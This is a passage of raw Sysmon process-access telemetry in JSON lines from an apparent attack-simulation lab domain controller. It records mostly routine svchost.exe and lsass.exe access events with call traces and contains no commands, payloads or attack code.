C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:57:13.399","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01B5-5F25-0000-0010FACE0000}","TargetProcessId":"1332","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:57:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:57:13","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6347,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:57:13.399\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01B5-5F25-0000-0010FACE0000}\r\nTargetProcessId: 1332\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:57:13.399","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01B5-5F25-0000-0010FACE0000}","TargetProcessId":"1332","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:57:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:57:13","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6348,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:57:13.399\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01B5-5F25-0000-0010FACE0000}\r\nTargetProcessId: 1332\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:57:13.399","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01B5-5F25-0000-0010FACE0000}","TargetProcessId":"1332","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:57:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:57:13","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6349,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:57:13.399\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01B5-5F25-0000-0010FACE0000}\r\nTargetProcessId: 1332\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:57:13.399","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01B5-5F25-0000-0010FACE0000}","TargetProcessId":"1332","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:57:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:57:13","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6350,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:57:13.399\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01B5-5F25-0000-0010FACE0000}\r\nTargetProcessId: 1332\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:57:13.399","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01B5-5F25-0000-0010FACE0000}","TargetProcessId":"1332","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:57:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:57:13","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6351,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:57:13.399\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01B5-5F25-0000-0010FACE0000}\r\nTargetProcessId: 1332\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:57:13.399","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01B5-5F25-0000-0010FACE0000}","TargetProcessId":"1332","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:57:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:57:13","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6352,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:57:13.399\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01B5-5F25-0000-0010FACE0000}\r\nTargetProcessId: 1332\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:57:13.399","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01B5-5F25-0000-0010FACE0000}","TargetProcessId":"1332","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:57:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:57:13","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6353,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:57:13.509\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-001001540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 904\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {A837DB8D-01B2-5F25-0000-0010EB030000}\r\nTargetProcessId: 4\r\nTargetImage: System\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\kerberos.DLL+96ea2|C:\\Windows\\system32\\kerberos.DLL+79354|C:\\Windows\\system32\\kerberos.DLL+13948|C:\\Windows\\system32\\lsasrv.dll+2e101|C:\\Windows\\system32\\lsasrv.dll+2c2c4|C:\\Windows\\system32\\lsasrv.dll+31819|C:\\Windows\\system32\\lsasrv.dll+2f177|C:\\Windows\\system32\\lsasrv.dll+2e101|C:\\Windows\\system32\\lsasrv.dll+16cdd|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1a96|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:57:13.509","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-001001540000}","SourceProcessId":"864","SourceThreadId":"904","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{A837DB8D-01B2-5F25-0000-0010EB030000}","TargetProcessId":"4","TargetImage":"System","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\kerberos.DLL+96ea2|C:\\Windows\\system32\\kerberos.DLL+79354|C:\\Windows\\system32\\kerberos.DLL+13948|C:\\Windows\\system32\\lsasrv.dll+2e101|C:\\Windows\\system32\\lsasrv.dll+2c2c4|C:\\Windows\\system32\\lsasrv.dll+31819|C:\\Windows\\system32\\lsasrv.dll+2f177|C:\\Windows\\system32\\lsasrv.dll+2e101|C:\\Windows\\system32\\lsasrv.dll+16cdd|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1a96|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be","EventReceivedTime":"2020-08-01 05:57:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:57:13","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6354,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:57:13.509\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01B5-5F25-0000-0010FACE0000}\r\nTargetProcessId: 1332\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: 